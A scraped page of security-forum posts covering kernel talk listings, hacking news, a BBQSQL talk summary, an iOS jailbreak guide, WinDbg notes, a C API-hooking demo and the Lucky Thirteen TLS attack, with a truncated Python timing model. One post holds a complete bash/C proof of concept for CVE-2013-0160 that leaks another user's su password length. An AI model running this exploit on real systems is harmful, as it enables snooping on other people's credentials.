right] 74M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]RealTime_Response_on_Multicore_Systems_It_Is_Bigger_Than_I_Thought.mp4[/TD] [TD=align: right]02-Feb-2013 19:12 [/TD] [TD=align: right] 23M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Rethinking_CPU_hotplug_for_elegance_and_efficiency.mp4[/TD] [TD=align: right]02-Feb-2013 20:04 [/TD] [TD=align: right] 90M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Ript_a_terse_but_expressive_DSL_for_iptables.mp4[/TD] [TD=align: right]02-Feb-2013 21:40 [/TD] [TD=align: right] 68M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Ristretto_runtime_types_for_JavaScript.mp4[/TD] [TD=align: right]03-Feb-2013 17:00 [/TD] [TD=align: right] 83M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Scratching_your_own_itch_subsurface_diving_log.mp4[/TD] [TD=align: right]03-Feb-2013 15:24 [/TD] [TD=align: right]118M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Shell_for_Starters.mp4[/TD] [TD=align: right]04-Feb-2013 12:09 [/TD] [TD=align: right]135M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Software_Transactional_Memory_in_GCC_47.mp4[/TD] [TD=align: right]03-Feb-2013 17:14 [/TD] [TD=align: right]151M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Stereographic_film_making_and_Linux.mp4[/TD] [TD=align: right]02-Feb-2013 23:09 [/TD] [TD=align: right] 86M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Systems_Administration_Server_and_Process_Behavior.mp4[/TD] [TD=align: right]03-Feb-2013 01:08 [/TD] [TD=align: right]282M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Teaching_Robotics_and_Embedded_Computing_with_Legos_and_Arduino.mp4[/TD] [TD=align: right]02-Feb-2013 19:25 [/TD] [TD=align: right] 41M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Teaching_the_X_server_new_tricks.mp4[/TD] [TD=align: right]04-Feb-2013 09:38 [/TD] [TD=align: right]102M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]The_IPocalypse_20_months_later.mp4[/TD] [TD=align: right]02-Feb-2013 19:25 [/TD] [TD=align: right]177K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]The_Perl_Renaissance.mp4[/TD] [TD=align: right]02-Feb-2013 20:17 
[/TD] [TD=align: right] 59M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]The_Raspberry_Pi_and_Linux.mp4[/TD] [TD=align: right]02-Feb-2013 21:45 [/TD] [TD=align: right]159M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]The_future_of_nonvolatile_memory.mp4[/TD] [TD=align: right]02-Feb-2013 19:24 [/TD] [TD=align: right] 49M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]The_real_story_behind_Wayland_and_X.mp4[/TD] [TD=align: right]03-Feb-2013 15:51 [/TD] [TD=align: right] 68M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Theres_a_Party_In_Your_Box_And_Everyones_Invited.mp4[/TD] [TD=align: right]02-Feb-2013 21:21 [/TD] [TD=align: right] 47M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Think_Create_Critique_Design.mp4[/TD] [TD=align: right]02-Feb-2013 23:18 [/TD] [TD=align: right] 78M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Touch_and_Go_Modern_User_Interfaces_with_Open_Source.mp4[/TD] [TD=align: right]02-Feb-2013 23:18 [/TD] [TD=align: right]121M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Transcendent_Memory_Not_Just_for_Virtualization_Anymore.mp4[/TD] [TD=align: right]03-Feb-2013 18:40 [/TD] [TD=align: right]118M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Trinity_A_Linux_kernel_fuzz_tester_and_then_some.mp4[/TD] [TD=align: right]03-Feb-2013 00:37 [/TD] [TD=align: right] 96M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Two_years_of_LibreOffice.mp4[/TD] [TD=align: right]03-Feb-2013 00:48 [/TD] [TD=align: right]109M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]UEFI_the_Converged_Firmware_Infrastructure.mp4[/TD] [TD=align: right]02-Feb-2013 21:48 [/TD] [TD=align: right] 95M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Using_Puppet_to_Model_Application_clusters.mp4[/TD] [TD=align: right]04-Feb-2013 10:23 [/TD] [TD=align: right]101M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Using_open_source_in_over_1100_schools_in_New_Zealand.mp4[/TD] [TD=align: right]02-Feb-2013 21:49 [/TD] [TD=align: right]1.8M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Vampire_Mice_How_USB_PM_impacts_you.mp4[/TD] [TD=align: right]02-Feb-2013 
23:03 [/TD] [TD=align: right]121M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Why_kernel_space_sucks.mp4[/TD] [TD=align: right]03-Feb-2013 15:51 [/TD] [TD=align: right] 63M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Wiggle_while_you_work.mp4[/TD] [TD=align: right]03-Feb-2013 13:48 [/TD] [TD=align: right] 92M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]gitannex.mp4[/TD] [TD=align: right]03-Feb-2013 18:29 [/TD] [TD=align: right] 61M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]redgrep_from_regular_expression_derivatives_to_LLVM.mp4[/TD] [TD=align: right]02-Feb-2013 18:58 [/TD] [TD=align: right] 60M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]users_delighted_better_UX_using_CSS_3_in_particular_and_HTML5_in_general.mp4[/TD] [TD=align: right]03-Feb-2013 14:37 [/TD] [TD=align: right] 94M[/TD] [TD] [/TD] [/TR] [TR] [TH=colspan: 5] [/TH][/TR] [/TABLE] Sursa: Index of /linux.conf.au/2013/mp4
-
The US could respond in kind to China's IT attacks
Nytro replied to Matt's topic in Security news
Chinese experts slam U.S. hacking accusations - People's Daily Online
US military advisor calls for McKinnon pardon, recruitment of "master hackers" • The Register
https://www.computerworld.com/s/article/9236535/President_can_order_preemptive_cyberattacks_if_needed
'Chinese still hacking us,' says Wall Street Journal owner | Security & Privacy - CNET News
-
Yes, you're right, it's work for little money. But let's not forget that open source doesn't mean a lack of funding. The big companies that effectively make money from open-source projects pay people to work on those projects. One example would be Intel, and an example project is the Linux kernel itself. If their processors didn't work on Linux that would be bad, so they invest in kernel programmers. It's much the same with other projects; in some cases donations or sponsorships are added, as with OpenSSL, which is waiting for $50K in sponsorships. But if we pay attention, we notice that it offers FIPS support, a certification that costs about $50K. What can be useful for these young people, apart from learning many new and useful things, is that they end up working at big companies like Google, which will treat them well.
-
The US could respond in kind to China's IT attacks
Nytro replied to Matt's topic in Security news
Uuu, shit just got serious... We have the two camps: 1. The Chinese, with that saying: How do the Chinese crack a password? Each one tries one. That is, there are many of them -> potential. 2. The Americans, who are guys with money and can pay some Indians $2 a year to do their dirty work. Who do you bet on?
-
From Jurnalul, the same news: "The 334 participating students from 36 countries had to solve 1925 different tasks and assignments proposed by the open source organizations" "The 20 solved 576 tasks, announces Google Open Source" Apparently he worked on BRL-CAD | Open Source Solid Modeling. I'm curious whether these initiatives are OK, or whether the companies are just getting some kids to do their work. It seems other projects there included Fedora, NetBSD, KDE and Haiku. Interesting.
-
Firefox will block all Java, Reader and Silverlight based content
Nytro replied to Matt's topic in Security news
HTML 5 is coming and there will be no more need for Java or Flash.
-
SSL - Bridges between secure and insecure
Nytro replied to unixbreak's topic in English tutorials
Yes, nice article
-
[h=1]Stephan T. Lavavej - Core C++, 8 of n[/h]
In part 8, STL digs into the do-while loop, casts, the one definition rule (ODR), and his variadic template array sorter. There is a lot of information in this episode, so get comfortable, tune in, and learn.

See part 1: Name Lookup
See part 2: Template Argument Deduction
See part 3: Overload Resolution
See part 4: Virtual Functions
See part 5: Explicit and Partial Specialization
See part 6: New C++11 features added to the Visual C++ 2012 compiler (CTP)
See part 7: Usual Arithmetic Conversions and Template Metaprogramming

Source: Stephan T. Lavavej - Core C++, 8 of n | C9 Lectures: Stephan T. Lavavej - Core C++ | Channel 9
-
Rapid Blind Sql Injection Exploitation With Bbqsql Description: Blind SQL injection can be a pain to exploit. When the available tools work they work well, but when they don't you have to write something custom. This is time-consuming and tedious. This talk will be introducing a new tool called BBQSQL that attempts to address these concerns. This talk will start with a brief discussion of SQL Injection and Blind SQL Injection. It will then segue into a discussion of how BBQSQL can be useful in exploiting these vulnerabilities. This talk will cover how features like evented concurrency and character frequency based searching can greatly improve the performance of a SQL Injection tool. This talk should leave you with enough knowledge to begin using BBQSQL to simplify and speed up your application pentests. Ben Toews is a Security Consultant at Neohapsis where he specializes in application and network pentesting. Previously, Ben has worked as a sysadmin and as a developer. Ben has spoken at Thotcon 0x03 and has been published in HITB Magazine. Ben has a BS in Information Assurance and Security Engineering from DePaul University. Twitter: @mastahyeti Ben Toews (mastahyeti) Scott Behrens is currently employed as a Security Consultant at Neohapsis and an Adjunct Professor at DePaul University. Before Neohapsis, Scott Behrens was an Open Systems Architect for a financial consulting firm, as well as a Network Administrator at Argonne National Laboratories. Scott Behrens' expertise lies in software security assessment, network penetration testing, social engineering, security architecture, and security research. Scott is also the co-developer of NeoPI, a framework to aid in the detection of obfuscated malware. Scott has also presented at Chicago B-sides and has published numerous articles in various security outlets. Scott Behrens has an MS in Network Security from DePaul University. 
Twitter: @HelloArbit Scott Behrens (Arbit) Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying. Original Source: Source: Rapid Blind Sql Injection Exploitation With Bbqsql
-
[h=1]Linux Kernel /dev/ptmx Key Stroke Timing Local Disclosure[/h]

#!/bin/bash
# ptmx-su-pwdlen.sh -- This PoC determines the password length of a local
# user who runs "su -". Done thanks to the ptmx keystroke timing attack
# (CVE-2013-0160). See http://vladz.devzero.fr/013_ptmx-timing.php for
# more information.
#
# Tested on Debian 6.0.5 (kernel 2.6.32-5-amd64).
#
# "THE BEER-WARE LICENSE" (Revision 42):
# <vladz@devzero.fr> wrote this file. As long as you retain this notice
# you can do whatever you want with this stuff. If we meet some day, and
# you think this stuff is worth it, you can buy me a beer in return. -V.

if ps -e -o cmd= | egrep -q "^(-|^)su"; then
  echo "[-] Kill/close all running \"su\" session before using this PoC"
  exit 1
fi

exe=$(mktemp) || exit 1
tmp=$(mktemp) || exit 1

cat > ${exe}.c << _EOF_
#include <stdio.h>
#include <signal.h>
#include <unistd.h>
#include <sys/inotify.h>

static int count = 0;

void display_result() {
  printf("[+] password len is %d\n", count-1);
  _exit(0);
}

int main() {
  int fd;
  char buf[1024];

  signal(SIGINT, display_result);
  fd = inotify_init();
  inotify_add_watch(fd, "/dev/ptmx", IN_MODIFY);
  while(read(fd, buf, 1024))
    count++;
  return 0;
}
_EOF_

cc -o ${exe}{,.c}

echo " [*] Wait for someone to run \"su -\""

while true; do
  ps -e -o cmd= | egrep "^(-|^)su" >${tmp}
  x=$(wc -l ${tmp})
  case ${x% *} in
    1) (( run )) && continue;
       echo -n "[+] su detected, full command: "
       cat ${tmp};
       ${exe} &
       (( run = 1 )) ;;
    2) [ ! -z "$!" ] && kill -2 $!;
       break ;;
  esac
done

rm -f ${exe}{,.c} ${tmp}

Source: Linux Kernel /dev/ptmx Key Stroke Timing Local Disclosure
-
Capture a request and show me exactly how your browser sends it. That way I don't have to sit there with tcpdump, it would kill me.
-
http://i49.tinypic.com/2rz75n6.png
-
I think you're joking... Those aren't posted with [ IMG ], they're just some links. Imgur: Imageshack: Don't they show up for you?
-
No way, now there are a lot from China, Indonesia, Brazil and other countries I've never heard of. How many visitors we have: There are currently 1517 users online. 81 members and 1436 guests. Is that all the girls have got?
netstat -ntp | sort -u | grep FIN_WAIT1 | grep -E -o '443.*([0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3})' | grep -E -o '([0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3})' | sort -u
-
Portable UPnP SDK unique_service_name() Remote Code Execution
Nytro replied to Praetorian503's topic in Exploituri
Details: https://community.rapid7.com/servlet/JiveServlet/download/2150-1-16596/SecurityFlawsUPnP.pdf -
It's possible that some servers check HTTP_REFERER and, if they see the request is coming from another server, return an error code. Post some examples.
-
Defrag Tools: #26 - WinDbg - Semaphores, Mutexes and Timers
By: Larry Larsen, Andrew Richards, Chad Beeder
In this episode of Defrag Tools, Andrew Richards, Chad Beeder and Larry Larsen continue looking at the Debugging Tools for Windows (in particular WinDbg). WinDbg is a debugger that supports user mode debugging of a process, or kernel mode debugging of a computer. This installment goes over the commands used to diagnose Semaphores, Mutexes and (Waitable) Timers in a user mode application. For timers, we delve deep into the kernel to gather more information about them.
We use these commands:
!handle
!handle <handle> <mask>
!object <name>
!object <addr>
!timer
!timer <addr>
ub @rip
dt nt!_KTHREAD <addr>
Make sure you watch Defrag Tools Episode #1 and Defrag Tools Episode #23 for instructions on how to get the Debugging Tools for Windows and how to set the required environment variables for symbol and source code resolution.
Resources: Synchronization Functions, Semaphore Objects, Mutex Objects, Waitable Timer Objects, Sysinternals LiveKD, Sysinternals WinObj, Windows 7 and Windows Server 2008 R2 Kernel Changes (Timer Coalescing)
Timeline:
[02:47] - Demo Apps [SkyDrive]
[03:08] - Semaphores
[09:32] - Mutexes
[15:32] - Waitable Timers
[15:58] - Clock Resolution
[17:05] - Timer Coalescing
[19:45] - Timer demo application
[25:05] - LiveKD makes a kernel dump
[26:37] - Object Manager - !object
[29:40] - DPC Timers - !timer
[35:22] - !timer <addr>
[35:52] - Waiting Threads - !thread <addr> 17
[37:08] - Wait Start TickCount
[38:55] - Kernel Wait Routines
[41:12] - Dump Type of Kernel Thread - dt nt!_KTHREAD <addr>
[42:00] - Running, Ready and Waiting states
[44:54] - Wakable Timers
[47:22] - powercfg.exe /waketimers
[49:18] - 'Century' DPC Timer Routine
[50:43] - Post in the forums and email us at defragtools@microsoft.com!
Source: Defrag Tools: #26 - WinDbg - Semaphores, Mutexes and Timers | Defrag Tools | Channel 9
-
[h=1]How to: iOS 6.x Untethered Jailbreak on Linux[/h]
The following tutorial will teach Linux users how to jailbreak their Apple iPhone 3GS, iPhone 4/4S, iPad 2/3/4 and iPod Touch 4G/5G devices that run iOS 6 or later. In this tutorial we will use the recently released evasi0n jailbreak tool, which runs on Linux, Mac OS X and Windows platforms. In no more than five minutes, your iDevice will be jailbroken, but only if you read the following information and warnings carefully.
Supported devices:
· iPhone 3GS;
· iPhone 4 GSM;
· iPhone 4S;
· iPod Touch 4G;
· iPod Touch 5G;
· iPad 2 Wi-Fi;
· iPad 2 3G;
· iPad 2 2012;
· iPad 3 Wi-Fi;
· iPad 3 Wi-Fi + 4G;
· iPad 4 Wi-Fi;
· iPad 4 Wi-Fi + 4G;
· iPad Mini Wi-Fi;
· iPad Mini 3G.
Requirements:
· evasi0n 1.0;
· A device from the above list with iOS 6.0, 6.0.1 or 6.1;
· A Linux distribution with a recent version of the libimobiledevice library, kernel >= 2.6.24, and libgtk+-2.0 >= 2.24.13.
WARNING: Make sure that your iPad, iPhone or iPod device is supported (see the supported devices list at the beginning of the article) and that it was already updated to iOS 6.x. Those of you who require a network unlock DO NOT PROCEED with the tutorial!
ATTENTION: ALWAYS make a backup of your device(s) before the jailbreak procedure! Make sure the battery is charged over 50% and that the device is connected to the computer via the USB cable! Not meeting these requirements will result in a failure!
Step 1 – Download and execute evasi0n
You can grab a copy of the evasi0n jailbreak tool right now from here. Download it on your desktop and extract the file from the archive. Both 32-bit and 64-bit architectures are supported. Connect your iDevice and double-click the executable for your architecture and you will see the following window...
Your device will be detected, and all you have to do now is to click the "Jailbreak" button. DO NOT PUSH ANY BUTTONS! DO NOT TOUCH THE COMPUTER! DO NOT REMOVE ANY CABLE! When the progress bar on the evasi0n tool is complete, and the evasi0n icon appears on your device, launch it to complete the jailbreak process! When evasi0n has finished the jailbreak process, reboot the device and you'll see the Cydia icon on the home screen of your iDevice, which means that the jailbreak process is over and you can restore the backup. Watch the video below for more details!
Source: How to: iOS 6.x Untethered Jailbreak on Linux - Softpedia
-
[h=1]JavaScript becoming default language for GNOME apps[/h] At the GNOME Developer Experience Hackfest in Brussels, the GNOME developer community has tackled the problem of specifying a canonical development language for writing applications for the GNOME desktop. According to a blog post by Collabora engineer and GNOME developer Travis Reitter, members of the GNOME team are often asked what tools should be used when writing an application for the desktop environment and, up until now, there has been no definitive answer. The team has now apparently decided to standardise on JavaScript for user-facing applications while still recommending C as the language to write system libraries in. The Hackfest took place in the days immediately preceding the FOSDEM 2013 conference in Brussels and was well attended by representatives from many different open source companies. There was a "broad consensus" to adopt a single language for GNOME application development, says Reitter. He points out that a canonical language enables the developers to more easily prepare documentation for, and share knowledge with, newcomers to the development community. It also helps more easily integrate applications written for the desktop with the desktop's infrastructure. After a long discussion weighing the arguments for and against several languages, the developers apparently decided on JavaScript, as it is already well supported in GNOME 3 by virtue of the fact that the desktop's GNOME Shell interface uses it to implement its user interface. Reitter also points to ongoing work to make JavaScript better supported as a first class desktop development language. GNOME's JavaScript plans are informed in part by how the language is used for similar purposes in Windows 8, Firefox OS and other systems, and that, the team hopes, will make it easier for developers who are new to GNOME to work with it. 
Despite the fact that JavaScript will be the recommended way to write GNOME applications, the developers are nonetheless stressing that other languages will still be supported. "It's critical that everyone understands this decision as a plan to elevate the language, bindings, tools, and documentation to a level of quality we have not yet achieved. It is not a decision to abandon any other language bindings", says Reitter. (fab) Source: JavaScript becoming default language for GNOME apps - The H Open: News and Features
-
ApiHooks 6
ApiHooks 6 is a set of libraries and tools for advanced process modification and noninvasive debugging on Microsoft® Windows® NT 3.51, 4.0, 2000, XP, 2003, Vista, 2008, 7 x86 and x64. AH6 is not compatible with AH5. It can hook even autochk at boot time or a process before its full initialization (= before the DllMains of statically linked modules are executed for the first time). Works under any account and doesn't modify files. There's still no need for services or kernel drivers. ApiHooks 6 is free.
Current version : 6.8
Previous version : 6.6
Previous version : 6.51
Previous version : 6.5
Previous version : 6.4
Previous version : 6.3
Source: ApiHooks 6 - ApiHooks.com
-
[h=1][c] API hooking demo[/h]Author: [h=3]nofrillz[/h]
As part of my honours project I need to hook APIs in different programs, so I've written a suite of functions which make it easy to hook. The body of the code is fairly messy, so I won't post it until I've tidied it up, but here's the main function I use to make this dynamic:

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

// structure for trampolines
typedef void* (*HOOKED)(void);

typedef struct _TRAMPOLINE {
    BYTE callstuff[6];          // this will be set constantly
    int num;
    HOOKED hooked;
    struct _TRAMPOLINE* next;
} TRAMPOLINE, *PTRAMPOLINE;

// globals the functions below rely on (declared here so the snippet compiles)
static PTRAMPOLINE tramplist = NULL;   // head of the trampoline list
static PTRAMPOLINE curtramp = NULL;    // trampoline that just called the wrapper
static char mbnum[64];                 // message box text buffer

void* MessageBoxWrapper(void);

DWORD SetupTrampoline(DWORD* tramp){
    int i = 0;
    DWORD oldperms;
    DWORD funcaddress;
    // find trampoline we want
    PTRAMPOLINE trampaddr = tramplist;
    PTRAMPOLINE lasttramp = tramplist;
    if(!tramplist){
        trampaddr = (PTRAMPOLINE) calloc(1, sizeof(TRAMPOLINE));
        tramplist = trampaddr;
    }
    else{
        while(trampaddr){
            i++;
            lasttramp = trampaddr;
            trampaddr = trampaddr->next;
        }
        trampaddr = (PTRAMPOLINE) calloc(1, sizeof(TRAMPOLINE));
        lasttramp->next = trampaddr;
    }
    // make trampoline executable
    VirtualProtect((LPVOID)(((DWORD) trampaddr) & 0xFFFFF000), 0x1000,
                   PAGE_EXECUTE_READWRITE, &oldperms);
    // update the trampoline struct
    trampaddr->callstuff[0] = 0xE8;   // call
    trampaddr->callstuff[5] = 0xC3;   // ret
    // relative displacement from the end of the 5-byte CALL to the wrapper
    funcaddress = ((DWORD) &MessageBoxWrapper) - ((DWORD) &trampaddr->callstuff) - 5;
    *((DWORD*) &trampaddr->callstuff[1]) = funcaddress;
    trampaddr->hooked = (HOOKED) *tramp;
    trampaddr->num = i;
    //hooked = (HOOKED) *tramp;
    return (DWORD) trampaddr;
}

void* MessageBoxWrapper(void){
    _asm{
        pop eax           // return address pushed by the CALL in callstuff
        sub eax,5         // back over the 5-byte CALL = start of the struct
        mov curtramp, eax
    }
    // get trampoline
    sprintf(mbnum, "Hook number #%d", curtramp->num);
    MessageBox(0, mbnum, "dynamic hooking", 0);
    if(curtramp->hooked)
        return (curtramp->hooked)();
    else
        return NULL;
}

The key to this is the TRAMPOLINE struct. The 6-byte array at the start holds a CALL to the MessageBoxWrapper function (named as this originally just hooked the MessageBoxW function) and a RET afterwards, which isn't strictly necessary as we negate the call later on.
The SetupTrampoline function saves a copy of the function we're hooking as a type HOOKED (a pointer that we can call), and returns a pointer to the TRAMPOLINE struct (which when called, will call the MessageBoxWrapper function). Once the TRAMPOLINE struct is set up, the function overwriting the import table (will be covered when I tidy up my other code) will store the pointer to it, and then when the infected process calls that API, it ends up calling the TRAMPOLINE struct instead, which then calls MessageBoxWrapper. The CALL opcode pushes the address of the next piece of code onto the stack and does a jump, so we push that off, subtract 5 from it (1 byte for CALL and 4 bytes for the address), and this gives us the pointer to the TRAMPOLINE struct. Because it's a data structure, we can extract any details that we added in earlier (so there's room for expansion here), but all we really need to do is jump to the address in the hooked parameter and we're done. I'm using vs05 for this, and it might not build the same for everyone, but doing return hooked() actually compiles to a JMP, which means the stack is untouched, and once it gets to the original function the stack is clear and any trace of us having messed with things is gone. Source: [c] API hooking demo - rohitab.com - Forums
-
Unlucky for you: UK crypto-duo 'crack' HTTPS in Lucky 13 attack
OpenSSL patch to protect against TLS decryption boffinry
By John Leyden, Posted in Security, 4th February 2013 16:58 GMT
Two scientists say they have identified a new weakness in TLS, the encryption system used to safeguard online shopping, banking and privacy. The design flaw, revealed today, could be exploited to snoop on passwords and other sensitive information sent by users to HTTPS websites. Professor Kenny Paterson from the Information Security Group at Royal Holloway, University of London and PhD student Nadhem Alfardan claim they can crack TLS-encrypted traffic in a man-in-the-middle attack. According to their study, the weakness revolves around altering messages exchanged between the web server and browser, and noting microsecond differences in the time taken to process them. These timings effectively leak information about the data being transferred, allowing eavesdroppers to rebuild the original unencrypted information slowly piece by piece. Specifically, an attacker strategically changes the data used to pad out the encrypted blocks of information, and measures the time taken for the server to work out that the message was tampered with before rejecting it. The progress of the algorithms processing the blocks is revealed by this time difference, and it's enough to gradually calculate the contents of the original message. But it is tricky to precisely measure these timings due to network jitter and other effects. And tampering with the data will cause the connection between the browser and the server to fail. Thus, a bit of client-side malware is needed to repeatedly probe a server with new connections, replaying slightly altered versions of the original encrypted message, which might for example be a login cookie. This is similar to the earlier BEAST (Browser Exploit Against SSL/TLS) attack.
We're told attacks against DTLS - a variant of TLS used by VPNs to secure traffic - can be carried out in a single session. Speaking to El Reg, Prof Paterson said JavaScript code injected into a web page could implement the new research and decrypt a victim's login cookie in about two hours: "An ordinary cyber-criminal would just use a phishing attack [to get a password] but for a nation state interested in getting an activist's login cookie for Tor, this sort of attack is possible for a determined and well-resourced attacker. "TLS is not quite as bullet-proof as we thought." A paper [PDF] titled Lucky Thirteen: Breaking the TLS and DTLS Record Protocols was published on Monday, and states: The Transport Layer Security (TLS) protocol aims to provide confidentiality and integrity of data in transit across untrusted networks like the Internet. It is widely used to secure web traffic and e-commerce transactions on the Internet. Datagram TLS (DTLS) is a variant of TLS that is growing in importance. We have found new attacks against TLS and DTLS that allow a Man-in-the-Middle attacker to recover plaintext from a TLS/DTLS connection when CBC-mode encryption is used. The attacks arise from a flaw in the TLS specification rather than as a bug in specific implementations. We have carried out experiments to demonstrate the feasibility of the attacks against the OpenSSL and GnuTLS implementations of TLS, and we have studied the source code of other implementations to determine whether they are likely to be vulnerable. Professor Paterson said: "While these attacks do not pose a significant threat to ordinary users in its current form, attacks only get better with time. Given TLS's extremely widespread use, it is crucial to tackle this issue now. "Luckily we have discovered a number of countermeasures that can be used. 
We have been working with a number of companies and organisations, including OpenSSL, Google and Oracle, to test their systems against attack and put the appropriate defences in place." The attacks apply to all TLS and DTLS implementations that are compliant with TLS 1.1 or 1.2, or with DTLS 1.0 or 1.2. All TLS and DTLS cipher-suites that include CBC-mode encryption are potentially vulnerable. Like CRIME (Compression Ratio Info-leak Made Easy) and the earlier BEAST SSL exploit, both developed by security researchers Juliano Rizzo and Thai Duong, the Royal Holloway academics' Lucky Thirteen study threatens a fundamental e-commerce security protocol. The latest attacks "are quite different from BEAST and CRIME" as the university pair explain in an FAQ: BEAST exploits the inadvisable use of chained IVs in CBC-mode in SSL and TLS 1.0. CRIME cleverly exploits the use of compression in TLS. Our attacks are based on analysing how decryption processing is carried out in TLS. However, our attacks can be enhanced by combining them with BEAST-style techniques. The computer-science duo tested their attack against OpenSSL and GnuTLS. For OpenSSL, full plaintext recovery of encrypted data is possible. For GnuTLS, partial recovery is possible. The researchers have not studied any closed-source implementations of TLS. Blocking the attack can be achieved by either adding random time delays to CBC-mode decryption or switching to either the RC4 or AES-GCM cipher-suites. GnuTLS released a patch on Monday. OpenSSL is working on a fix. Other vendors, including web browser developers, may also need to adapt their software in response to the threat. ® Bootnote The researchers have a neat explanation for why the attack they have developed is called Lucky Thirteen: "In Western culture, 13 is considered an unlucky number. 
However, for our attack, the fact that the TLS MAC calculation includes 13 bytes of header information (5 bytes of TLS header plus 8 bytes of TLS sequence number) is, in part, what makes the attacks possible. So, in the context of our attacks, 13 is lucky - from the attacker's perspective at least. This is what passes for humour amongst cryptographers."
Source: Unlucky for you: UK crypto-duo 'crack' HTTPS in Lucky 13 attack • The Register
PDF: http://www.isg.rhul.ac.uk/tls/TLStiming.pdf
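As an added illustration, not from the article or the paper, the following Python model shows why the MAC-after-padding check leaks: two decrypted records of identical length but different padding cost a different number of HMAC compression calls, while a check that tops the work up to a bound that depends only on the record length costs the same for every record. The record layout, the 13-byte MAC header and the zero-length-pad fallback follow the TLS 1.1 record format; the key, sequence number and payloads are constructed, and the compression counter stands in for wall-clock time.

```python
"""Simplified model of the TLS 1.1/1.2 CBC record check that Lucky 13 exploits.

Constructed example, not from the article, the paper or any TLS library.
A decrypted record is laid out as: payload || HMAC-SHA1 tag || pad || padlen.
The MAC covers 13 header bytes (8-byte sequence number, 1-byte content
type, 2-byte version, 2-byte length) plus the payload. Time is modelled by
counting SHA-1 compression calls inside HMAC, the quantity the paper's
timing measurements ultimately observe.
"""
import hashlib
import hmac
import struct

MAC_LEN = 20      # HMAC-SHA1 output length
SHA1_BLOCK = 64   # SHA-1 compression block size
HEADER_LEN = 13   # the "lucky" 13 bytes


def hmac_compressions(msg_len):
    """SHA-1 compression calls HMAC needs for a msg_len-byte message:
    inner hash over ipad-block || msg (+ 9 bytes of SHA-1 padding),
    outer hash over opad-block || 20-byte inner digest (always 2 blocks)."""
    inner = (SHA1_BLOCK + msg_len + 9 + SHA1_BLOCK - 1) // SHA1_BLOCK
    return inner + 2


def compute_mac(key, seq, ctype, version, payload):
    """Return (tag, cost): the record MAC and the modelled work to compute it."""
    header = struct.pack(">QBHH", seq, ctype, version, len(payload))
    data = header + payload
    return hmac.new(key, data, hashlib.sha1).digest(), hmac_compressions(len(data))


def build_record(key, seq, ctype, version, payload, padlen):
    """Constructed decrypted record with a valid MAC and padlen+1 padding bytes."""
    tag, _ = compute_mac(key, seq, ctype, version, payload)
    return payload + tag + bytes([padlen]) * (padlen + 1)


def _parse_padding(plain):
    """Return (pad_ok, padlen); on bad padding fall back to a zero-length pad,
    which is what RFC 5246 section 6.2.3.2 told implementations to do."""
    padlen = plain[-1]
    pad_ok = (padlen + 1 <= len(plain) - MAC_LEN
              and all(x == padlen for x in plain[-(padlen + 1):]))
    return pad_ok, (padlen if pad_ok else 0)


def check_record_leaky(key, seq, ctype, version, plain):
    """Pre-fix behaviour: MAC work depends on how much padding was accepted,
    so an observer who can time the check learns about the padding bytes.
    Returns (accepted, cost)."""
    pad_ok, padlen = _parse_padding(plain)
    payload_len = len(plain) - MAC_LEN - padlen - 1
    payload, tag = plain[:payload_len], plain[payload_len:payload_len + MAC_LEN]
    expected, cost = compute_mac(key, seq, ctype, version, payload)
    mac_ok = hmac.compare_digest(expected, tag)
    return pad_ok and mac_ok, cost


def check_record_constant(key, seq, ctype, version, plain):
    """Hardened check in the spirit of the post-Lucky-13 patches: top up the
    MAC work to what the longest possible payload for this record length
    would need, so every record of a given length costs the same.
    (A real implementation also removes the data-dependent branches
    with masking; this model only equalises the hash work.)"""
    pad_ok, padlen = _parse_padding(plain)
    payload_len = len(plain) - MAC_LEN - padlen - 1
    payload, tag = plain[:payload_len], plain[payload_len:payload_len + MAC_LEN]
    expected, cost = compute_mac(key, seq, ctype, version, payload)
    mac_ok = hmac.compare_digest(expected, tag)
    max_payload = len(plain) - MAC_LEN - 1          # only the padlen byte
    target = hmac_compressions(HEADER_LEN + max_payload)
    for _ in range(target - cost):                  # dummy compressions
        hashlib.sha1(b"\x00" * SHA1_BLOCK).digest()
    return pad_ok and mac_ok, target


if __name__ == "__main__":
    key = b"\x0b" * 20                               # constructed MAC key
    args = (key, 1, 23, 0x0302)                      # seq 1, application_data, TLS 1.1
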